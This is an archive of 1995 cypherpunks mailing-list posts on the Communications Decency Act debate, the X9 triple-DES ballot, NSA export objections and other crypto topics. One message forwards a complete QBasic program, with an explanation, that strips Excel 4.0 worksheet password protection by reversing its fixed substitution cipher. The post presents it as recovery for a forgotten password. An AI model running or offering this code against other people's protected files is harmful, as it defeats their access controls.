>Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
>of the bill with Sen. Exon and Marc Rotenberg of the Electronic
>Privacy Information Center (EPIC).



>_________________________________________________________________________
>Subject: EPIC to Debate Exon on CNN
>_________________________________________________________________________
>David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
>Electronic Privacy Information Center * 202-547-5482 (fax)
>666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
>Washington, DC 20003                * HTTP://epic.digicash.com/epic

For those of us who can't see this, will the text be available
anywhere?

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:59:56 PST
To: cypherpunks@toad.com
Subject: Re: bill alert...
Message-ID: <199502132049.PAA01819@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Do you think this will force folks into using encryption?
> > If I was a sysop, I sure would have all my users using
> > encryption... :)
> > -lile
[ obscene government threats CENSORED ]

Well, a good start would be to use an encrypted filesystem for any
server that you're allowing the general public on, and to support
encryption on any remailers you might run...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/FoCoZzwIn1bdtAQEANgGAipZg3vy7lkdA/WC9LnuCQspo2bXOxVOy
ktMyX8kDHpInuZx77TnCq7LwpyC5GkKa
=jQov
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 13 Feb 95 13:58:18 PST
To: roy@cybrspc.mn.org
Subject: Re: bill alert...
In-Reply-To: <950213.082427.4B5.rusnews.w165w@cybrspc.mn.org>
Message-ID: <199502132155.PAA00114@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> > Then you would have no users. Users resent being made to do anything they
> > don't want to do. If they decide it is worth it they will do it, otherwise
> > they go elsewhere.
> 
> Some will leave.  Some (one might argue the ones with any basic
> intelligence) will stay.  Sure, many users resent being herded.  But the
> ones that stick around will be of a higher calibre.
> 
> Think of it as evolution in action.
>
I see it as going broke in action...the majority of your users will leave.
Then exactly how do you pay the bills?

This singlemindedness is unworkable in the real world. One of the whole ideas
that I am concerned with regarding crypto is to have people STOP telling me
what to do. Why would I want to become what I hate?

Take care.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 13 Feb 95 15:55:31 PST
To: cypherpunks@toad.com
Subject: Ignore Test
Message-ID: <199502132355.PAA19451@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The list seems a tad slow today.  No new messages.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@xs4all.nl (Name withheld on request)
Date: Mon, 13 Feb 95 13:59:27 PST
To: cypherpunks@toad.com
Subject: Re:  The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502132058.PAA01939@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- ----- BEGIN PGP SIGNED MESSAGE HERE ----
An entity purporting to be Mike Duvos writes:

> Such a situation does not apply solely to the NSA.  There are,
> for instance, secret lodges of French mystics who devote
> themselves to higher mathematics, absorb everything the open
> community produces, and rarely publish anything or draw attention
> to themselves.  They solve problems, write secret manuscripts,
> put them on shelves, and have been doing this for centuries.
> Perhaps the ultimate factoring algorithm already exists within
> their walls.  We would never know if it did, unless they chose to
> tell us.

Actually, the French group is a subsidiary of our Bavarian operation.
However, "centuries" is, well, somewhat inaccurate, though the 
mathematician who first mentioned our existence about that time has
since recanted after a visit from the Elders...

				A.W.

- ----- PGP SIGNATURE BLOCK ----
PGP-Version: 23.5
PGP-Signature: T!
- ----- END PGP SIGNED MESSAGE -----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/HsCoZzwIn1bdtAQEU/wF/Rr/9NvFyxbdxadvn6fql1wjfy19/oXOV
87PHHcmP1OWOxE8HU1oaZ9ZwVcNhD3XX
=dIax
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Mon, 13 Feb 95 13:59:42 PST
To: cypherpunks@toad.com
Subject: Archives
Message-ID: <199502132102.QAA02019@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

(Add to the list of things to do: make a recurring post describing cpunk
 services available at various places, incl. c2.org, ftp.csua.berkeley.edu,
 hks.net, Tim's Cyphernomicon, etc.

 Anybody else willing to put the whole burrito together, or should I add it
 to my TODO list?)

Somebody asked where the cypherpunks archives are.  Recent traffic is 
available via nntp from news://nntp.hks.net/hks.lists.cypherpunks;  Traffic
older than that, back to June 94 at
news://nntp.hks.net/hks.lists.cypherpunks-archive, and back to the beginning
of the list from

    ftp://ftp.hks.net/cypherpunks/All/cypherpunks.archive.[0-3].gz

The archives are extrememly difficult to navigate through right now, but
the raw material is there and available.  One of these days I will finish
the harvest and/or hypermail installation to facilitate access.
- - --
Todd Masco     | "No matter how peculiar the medium or incongruous the scale,
cactus@hks.net |   the instinct to build persists."   - Joy Of Cooking
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz+PFRNhgovrPB7dAQHc1gP/WSdhsJ7l0LpnEGm8wFBHrBcf4r9ujv7M
OpK6SrfV1/ail5eWZN3waZWgMRzxLxVIkxk7cIILMWo7rZgwM3j50UH6VULWX+8f
o8XBUsKqKxf2UYsm1Ew92HAXdgZgAHj+L2s3L38t2mFxuobK2JhB2+slFC4JEa1P
nBKVgd0O8P0=
=5DSV
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/IrioZzwIn1bdtAQExxAGAptVJi2VmN3g+5zH21/GkBI4mft0Ww/S0
ufiqJkfGVSB50HPrKcvyCLmVPq+lcc9s
=vg0X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 13 Feb 95 14:50:01 PST
To: wcs@anchor.ho.att.com
Subject: Re: perry@imsi.comRe: Does PGP scale well?
In-Reply-To: <9502132105.AA24452@anchor.ho.att.com>
Message-ID: <9502132122.AA01505@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



wcs@anchor.ho.att.com says:
> Of course, that's more useful for MIT, which owns Network 18,
> than for the thousands of people on networks 192.xxx.xxx;
> reverse lookups don't seem as reliable for Class C.

I've never had trouble with maintaining xxx.xxx.in-addr.arpa servers;
dunno what causes yours...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Mon, 13 Feb 95 16:24:50 PST
To: gnu@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <13876.792721476@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain



        In a November letter to committee members, the NSA
        threatened to prevent the export of triple- DES, citing
        existing US law and potential threats to national
        security (see attached NSA letter).

Oh, no, surely not.  There must be some misunderstanding here -
they *promised* they wouldn't block export of non-Clipper
things.  They wouldn't lie!


Jack Repenning                M/S 1-875     jackr@engr.sgi.com
Silicon Graphics, Inc.         x3-3027      Off:(415) 390-3027
Visual Magic Division                       Fax:(415) 390-6056




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Mon, 13 Feb 95 15:00:08 PST
To: cypherpunks@toad.com
Subject: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <9502132259.AA14841@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



gnu@toad.com writes:
 > In their November letter to X9 committee members, the NSA 
 > attempted to undermine the attractiveness of triple-DES by 
 > arguing that it is cryptographically unsound, a potential 
 > threat to national security, and would not be exportable 
 > under US law.

One is forced to wonder at the sort of person that can with a straight
face argue that on the one hand an algorithm is cryptographically
unsound, while at the same time posing a threat to national security.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 13 Feb 95 17:11:09 PST
To: cypherpunks@toad.com
Subject: Re: Excel 5 Encryption
In-Reply-To: <199502140019.TAA23023@jax.jaxnet.com>
Message-ID: <199502140110.RAA17460@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> bwern@jax.jaxnet.com (Ben Wern) writes:
> I was wondering if anyone out there has played with or 'broken' Microsloths
> encryption, especially in it's Excel from?

Accessdata of Orem Utah (1-800-658-5199) sells cracks for many of them.
So does John Kuslich (602-863-9274); I think his prices are lower.
I don't personally known or endorse either of 'em.

I append a message with some code for doing 4.0 -- I haven't tried it, and
don't know if it works for 5.0.  It's in Basic, but I didn't perpetrate it.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:05
___________________________________________________________________________

Newsgroups: alt.security
Path: rand.org!usc!news.service.uci.edu!ihnp4.ucsd.edu!agate!howland.reston.ans.net!cs.utexas.edu!convex!news.duke.edu!solaris.cc.vt.edu!swiss.ans.net!newsgate.watson.ibm.com!hawnews.watson.ibm.com!news
From: agriffiths@vnet.ibm.com (Alan Griffiths)
Subject: Re: Excel pass crack
Sender: news@hawnews.watson.ibm.com (NNTP News Poster)
Message-Id: <CwH0Jo.15sv@hawnews.watson.ibm.com>
Approved: myself
Date: Wed, 21 Sep 1994 08:21:24 GMT
Lines: 103
Reply-To: agriffiths@vnet.ibm.com (Alan Griffiths)
Disclaimer: This posting represents the poster's views, not necessarily those of IBM.
References: <Rw+xX1t.cinepott@delphi.com>
Nntp-Posting-Host: nhbrp75.caanerc.uk.ibm.com
Organization: LORAL CAA NERC Project
X-Newsreader: IBM NewsReader/2 v1.01

In <Rw+xX1t.cinepott@delphi.com>, Bob <cinepott@delphi.com> writes:
>Someone was looking for a crack to excel's passwords, apparently they
>forgot their password ? Well I found these helpful tidbits posted
>previously.
> 
>|>Encryption of Ms Excel files
>|>    From: Fabio Ottolina <fabio@tdc.dircon.co.uk>
>|>   Date: 29 Jan 1994 12:51:18 GMT    (1 screen)
>|>
>|>    I have saved an Excel 4.0 for Windows file with password-protection, and
>|>I can't remember the password (how remarkably stupid! :-)).
>|>Is there any way to crack the password-protection of Excel files?

You may find the following program of help. I am sorry it's in QBasic but that's the
only free language I have at present. The program removes document protection from
Excel worksheets. I haven't tested it extensively so there are no guarantees or warranties.
Always keep a backup copy of your files etc...

The protection scheme does two things:

 1. When you protect your document, Excel hashes your password to a 16 bit value, stores
    it somewhere and sets a few flags to say that the document is protected.

 2. When Excel saves a protected document it encrypts the content of each block using 16
    different alphabetic substitutions. This allows Excel to read and display protected
    documents before knowing their password. The program below unscrambles a protected
    document, removes an extra 8 byte block at the beginning, and resets the flags and
    passwords to zero.

I don't know if it can cope with all combinations of protection available in Excel. It
works fine on the simple protect document option. Similarly, charts etc. will probably
get munged since I don't think the titles etc get scrambled.

Hope this stuff is of use to someone.       Alan.

PS. Ironically enough, I found Excel of great value in recovering the set of magic numbers
used in the program. It allowed me to very quickly generate and evaluate possible decryption
formulae!

-------------------cut here------------------------------
DECLARE FUNCTION decrypt$ (c$, adr&, blen%)
DEFINT A-Z
DIM SHARED magic(15)
FOR i = 0 TO 15
  READ magic(i)
NEXT
DATA 196, 115, 164, 32, 60, 91, 212, 23, 240, 31, 40, 19, 240, 75, 180, 3

COLOR 14, 1
CLS
INPUT "Enter input Cyphertext filename: ", cf$
INPUT "Enter output Plaintext filename: ", pf$
OPEN pf$ FOR BINARY ACCESS WRITE AS #1
OPEN cf$ FOR BINARY ACCESS READ AS #2

chdr$ = INPUT$(18, #2)
phdr$ = LEFT$(chdr$, 10)
PUT #1, , phdr$
fp& = 10
cbh$ = INPUT$(4, #2)
WHILE NOT EOF(2)
  PUT #1, , cbh$
  blen = ASC(MID$(cbh$, 3, 1)) + 256 * ASC(MID$(cbh$, 4, 1))
  btyp = ASC(MID$(cbh$, 1, 1)) + 256 * ASC(MID$(cbh$, 2, 1))
  fp& = fp& + 4
  IF blen > 0 THEN
    cblk$ = INPUT$(blen, #2)
    x$ = decrypt$(cblk$, fp& - 4, blen)
    IF blen = 2 THEN
      SELECT CASE btyp
        CASE 18, 19, 99
          x$ = STRING$(2, 0)
      END SELECT
    END IF
    PUT #1, , x$
  END IF
  fp& = fp& + blen
  cbh$ = INPUT$(4, #2)
WEND
CLOSE #1
CLOSE #2
END

FUNCTION decrypt$ (c$, adr&, blen)
  offset = (adr& + blen) AND 15
  d$ = STRING$(blen, 0)
  FOR i = 1 TO blen
    c = ASC(MID$(c$, i, 1))
    crot = ((c * 8) MOD 256) OR (c \ 32)
    ctst = magic(offset)
    clss = (2 * (crot AND ctst)) AND 255
    d = (256 + crot + ctst - clss) AND 255
    MID$(d$, i, 1) = CHR$(d)
    offset = (offset + 1) AND 15
  NEXT
  decrypt$ = d$
END FUNCTION
-------------------cut here------------------------------

Alan Griffiths        CAA NERC Project    agriffiths@vnet.ibm.com
Tel: +44-705-561325                       Fax: +44-705-214094

All opinions expressed are my own and do not represent IBM in any way
___________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 13 Feb 95 17:18:00 PST
To: cypherpunks@toad.com
Subject: Re: What *is* the power of the FIPS
In-Reply-To: <Pine.3.89.9502131927.B13826-0100000@world.std.com>
Message-ID: <199502140117.RAA17498@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Peter F Cassidy <pcassidy@world.std.com> writes:
>...                          I animated the characters and campaign
> strategies in this narrative common to the clipper and DT initiatives. In 
> that, taking about Clipper I mentioned its rise as a FIPS, etc. 
> -        QUESTION: Just what is the power of the FIPS outside of the 
> interop issues in sending stuff back and forth from federal agencies?

Seems to me a FIPS is an important standard to the extent that it contains
important and useful information.  The DES FIPS 46-2 and 81 do, and
they've been widely influential.  The EES (Clipper) FIPS 185 doesn't --
it's mostly terminology to support GACK (Government Access to Crypto Keys)
-- and has been largely ignored outside of said federal agencies, so far
as I know.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 13 Feb 95 17:53:17 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <Pine.3.89.9502131742.A19443-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Samuel Kaplin wrote:
>  A sellout was offered a 
> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
> interested in the issue.

You expected something different from "EPIC"?

Cypherpunks are supposed to be paranoid.  You are
not paranoid enough.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 13 Feb 95 17:31:07 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <199502140114.UAA17825@ducie.cs.umass.edu>
Message-ID: <199502140131.RAA17561@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "L. McCarthy" <lmccarth@ducie.cs.umass.edu> writes:
> Are the minutes of the deliberations of X9, in complete or digest form,
> available to the public anywhere ? It would be useful to get a sense of how
> close the vote was, whose representatives voted which way, and the arguments

I haven't seen that kind of detail, but here's a piece with some of the
players posted by one member in December.  I don't have the message from
voorhees that he responded to.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:27
_________________________________________________________________

From: x9a3@aol.com (X9a3)
Newsgroups: talk.politics.crypto
Subject: Re: Triple-DES
Date: 12 Dec 1994 20:50:26 -0500
Organization: America Online, Inc. (1-800-827-6364)
Lines: 29
Sender: news@newsbf01.news.aol.com
Message-ID: <3ciul2$hc8@newsbf01.news.aol.com>
References: <3cg57o$hvq@interport.net>
NNTP-Posting-Host: newsbf01.news.aol.com

In article <3cg57o$hvq@interport.net>, voorhees@interport.net writes:

Rich has the 3DES ballot results correct. It is currently our for
reconsideration which happens when there are 'no' votes.  It is expected
to pass.  Marty Ferris (Treasury and chair of X9F) chaired the X9F meeting
in Austin - which I attended as well as the earlier meeting of X9F4 on
Home Banking - and reported that the 3DES WI would probably go to Blake
and X9F1.  There will probably be a subworking group chaired by Glenda
Barnes of Cylink to shepard the 3DES along. Several of us will be
participating in the action.  We don't intend to let Blake sit on it or
kill it.  His rantings over some of the DES stuff is based on pure
conjecture and perhaps visions delivered in the night by NSA.  There are
no short cuts to a properly implemented DES system - only exhaustion. Ask
Bihnam and Shamir. The majority of folks (read banks) interested in 3DES
wan to see a two key system and not the 3 key proposed by Cylink for a
variety of reasons.  2key EDE DES produces key strength of 112 and not
somewhere between 70 and 80 as claimed by Father Blake.  The 70-80 is
probably more disinformation from the NSA to make SKIPJACK appear more
acceptable.  Many of us are convinced that Blake is paid by the spooks but
he will not publicly admit that he is.     The 3DES WI originated in X9F3
chaired by Gary Chauklin of the FRB and the 3DES WI was moved from X9F3 to
X9F1 over the objections of the X9F3 members and Gary.  When Marty was
questioned how that decision was made it became clear it was arbitrary and
Marty probably made it himself.  The meeting will be in Feb in Balitmore -
should be interesting.....         watch this space!!!                    
          ... peace ... abe

Abraham & Associates, Inc.; Applications in Cryptography;  Concord, NC
_________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 13 Feb 95 17:36:40 PST
To: cypherpunks@toad.com
Subject: French Mystics, Martin Gardner, and Transcendentality
Message-ID: <199502140136.RAA11222@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An anonymous traveler on the Path writes:

 > Actually, the French group is a subsidiary of our Bavarian
 > operation. However, "centuries" is, well, somewhat
 > inaccurate, though the mathematician who first mentioned our
 > existence about that time has since recanted after a visit
 > from the Elders...

"Centuries" was perhaps an exaggeration.  I first became aware of
the existance of the French group when Martin Gardner published
an extremely interesting April Fool's edition of "Mathematical
Games" in Scientific American a number of years back.

The thesis of his piece was that some very simple expressions
involving transcendental numbers such as Pi and E had been proven
to be integers. When you checked them on a calculator, they did
indeed appear to be exact integers, in spite of a well-known
theorem which claimed otherwise.

The clever trick was that they were of course transcendental, but
differed from integers by a small epsilon far beyond the 15 digit
range of most ordinary calculators.

A number of us were trying to figure out how Martin Gardner had
constructed the expressions he had published, and quickly found
that doing so was a non-trivial mathematical problem.  We were
about to give up when a young associate professor walked in,
picked up a piece of chalk, and demonstrated a really clever
trick involving rings which permitted one to crank out such
expressions with the greatest of ease.

When we inquired as to the origin of the work he was citing, we
were told that this really clever mystical order in France had
recently decided to release this particular discovery into the
public domain, where it had served as the source for Martin
Gardner's baffling column.

Perhaps they will give us a factoring algorithm if we ask them
nicely. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 13 Feb 95 16:40:57 PST
To: unicorn@access.digex.net (Black Unicorn)
Subject: Re: your mail
In-Reply-To: <Pine.SUN.3.91.950213181829.14382C-100000@access3.digex.net>
Message-ID: <199502140040.RAA24255@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:

> Has anyone checked into the software package "CryptDisk" for the 
> Macintosh?  It seems to be the Macintosh compliment to SecureDrive, but 
> one must register and drop an extra $20 for the source code.
> 
> I don't want to get into the issue of copyright and such, only the 
> question of how much public scrutiny the source code for this application 
> has seen.
> 
> Anyone taken a peek?

I have a copy of it. I haven't reviewed it in detail yet, but the general
features look quite solid. I'll post a review of the methods when I've
had a better look, if people are interested.

                                 -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 14:42:02 PST
To: cypherpunks@toad.com
Subject: CNN (fwd) Communications (In)Decency Act?
Message-ID: <199502132241.RAA14045@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

This was just sent to me.

> Date: Mon, 13 Feb 1995 14:31:08 -0800
> Subject: CNN
> Content-Type: text
> Content-Length: 309
> 
>  CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
>  live segment on S. 314, "The Communications Decency Act," introduced by
>  Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion
>  of the bill with Sen. Exon and Marc Rotenberg of the Electronic
>  Privacy Information Center (EPIC).
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 13 Feb 95 17:48:00 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <199502140131.RAA17561@mycroft.rand.org>
Message-ID: <199502140147.RAA17640@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Jim Gillogly <jim@rand.org> writes:
>...I don't have the message from voorhees that he responded to.

Woops, just found it.  This is the predecessor to my previous forward
from x9a3, relating to Triple DES (3DES), complete with votes.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:46

_________________________________________________________________

From: voorhees@interport.net
Newsgroups: talk.politics.crypto
Subject: Triple-DES
Date: 12 Dec 1994 00:24:24 GMT
Organization: Interport Communications
Lines: 87
Message-ID: <3cg57o$hvq@interport.net>
Reply-To: voorhees@interport.net
NNTP-Posting-Host: voorhees.port.net
X-Newsreader: IBM NewsReader/2 v1.03

The following post is from Rich Ankeny, a member of
X9F1 and possibly F3, too.

He does not have easy access to newsgroups, so I am
posting it on his behalf.

--Mark



I have a few comments on triple DES:

1.  X9F1 to Develop the Standard?

I read with interest your recent Usenet post about triple DES. I was not
aware that Marty Ferris (X9F chair) had already (offically) decided to
give the work to Blake. We (various X9F1/3 members) had figured the way
to delay it the longest is to form a new working group (X9F5:-).

2.  Blake's Opinions

Blake's claim is that triple DES (with two keys) is not 112 bits strong;
in fact it is somewhere between 70 and 80 bits strong. He gives no
details to back this up, though.  His other objection is that, since there
are only 32 bits input to the DES S-boxes in each round, at some point in
the future (say 10 years or so) this can be "cryptanalyzed" using table
lookups rather than test encryptions or other means, even on a desktop
sized machine (with lots of memory).  This is actually a reasonable
prediction, but it applies to single DES.  As to two-key triple DES, the
only published attack I'm aware of is a paper by Paul van Oorschot and
Michael Wiener of BNR (cited in Applied Cryptography, among other places);
their attack uses *lots* of memory and running time of less than 2^100
steps. I guess it all depends on who you think is the better
cryptanalyst:-)  Anyway, the X9 proposal was to use three-key triple DES;
one would hope that's at least 112 bits strong.

3.  The X9 Vote

I got the voting record from X9 on the triple DES NWI:

YES:  Applied Communications, AT&T, Bank of America, Bank of Boston,
Chemical Bank, Deluxe Check Printers(!), Federal Reserve, Fidelity
Investments, Mastercard, Mellon Bank, VISA, Wells Fargo.

NO:  NSA, NationsBank (their rep is X9 chair).

ABSTAIN:  ABA, American Express, Canadian Bankers Assoc., Moore Business
Forms, NIST, Unisys, Xerox.

10 members didn't return their ballots, including Citibank, Chase
Manhattan, and IBM.  This is not unusual for larger organizations
where the ballots sit on someone's desk for three or four months.  I
imagine many will be voting on the reconsideration ballot.

NO votes must have reasons, and abstentions typically do as well:

NSA:  We've seen their reasons already in earlier postings.
NationsBank:  Too much controversy and too many open issues (based, I
   would think, on the NSA comments)
ABA:  Concerned about the NSA comments (esp. exportability) and that
   adopting triple DES now would affect the number of options available
   in the long term.  ABA is opposed to Clipper/Capstone as currently
   proposed.  In particular:  (a) it must have congressional support,
   (b) at least one escrow agent must be a private sector entity, (c) it
   must be exportable, (d) there must be a *demonstrable* mechanism
   whereby escrow keys used in wiretap equipment cannot be compromised
   and are destroyed at the end of the wiretap period, (e) the
   algorithm must be unclassified or made available for an acceptable
   evaluation procedure by the banking industry, and (f) analysis of other
   issues is needed, including possiblity of software implementation, and
   compatibility with installed DES infrastructure.
Federal Reserve:  Supports triple DES, as an immediate alternative to DES.
   Also offers some much less negative wording for the reconsideration
   ballot.  (The original ballot did everything but recommend a NO vote.)



I don't have Usenet access (without "borrowing" a friend's account), so
please feel free to repost any of this you feel might interest the
EFF and other newsgroups.



Regards,
Rich Ankney
(Fischer Int'l)
_________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 13 Feb 95 15:56:21 PST
To: cypherpunks@toad.com
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <n1419433051.47954@epic.org>
Message-ID: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On 13 Feb 1995, Dave Banisar wrote:

> 
> 
> CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
> segment on S. 314, "The Communications Decency Act," introduced by
> Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
> of the bill with Sen. Exon and Marc Rotenberg of the Electronic
> Privacy Information Center (EPIC).

Just got done watching it (and I have it on video tape.) In a nutshell, 
Senator Exon was much more convincing than Mr. Rotenberg. :( Why didn't
EPIC field someone with better debating skills? A sellout was offered a 
la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
interested in the issue. This is not a good omen. The perseption left in 
my non-internet literate wife was that the INTERNET=smut. :(

All in all, not a good showing IMHO,

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 13 Feb 95 15:21:09 PST
To: Cypherpunks List <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950213181829.14382C-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




Has anyone checked into the software package "CryptDisk" for the 
Macintosh?  It seems to be the Macintosh compliment to SecureDrive, but 
one must register and drop an extra $20 for the source code.

I don't want to get into the issue of copyright and such, only the 
question of how much public scrutiny the source code for this application 
has seen.

Anyone taken a peek?

-uni- (Dark)


--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: (Bull Worldwide AutoResponder) <UseNet@news.bull.com>
Date: Mon, 13 Feb 95 15:37:56 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502132337.AA59383@cass.ma02.bull.com>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine at
Bull Worldwide Information Systems, in Billerica, MA, USA.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

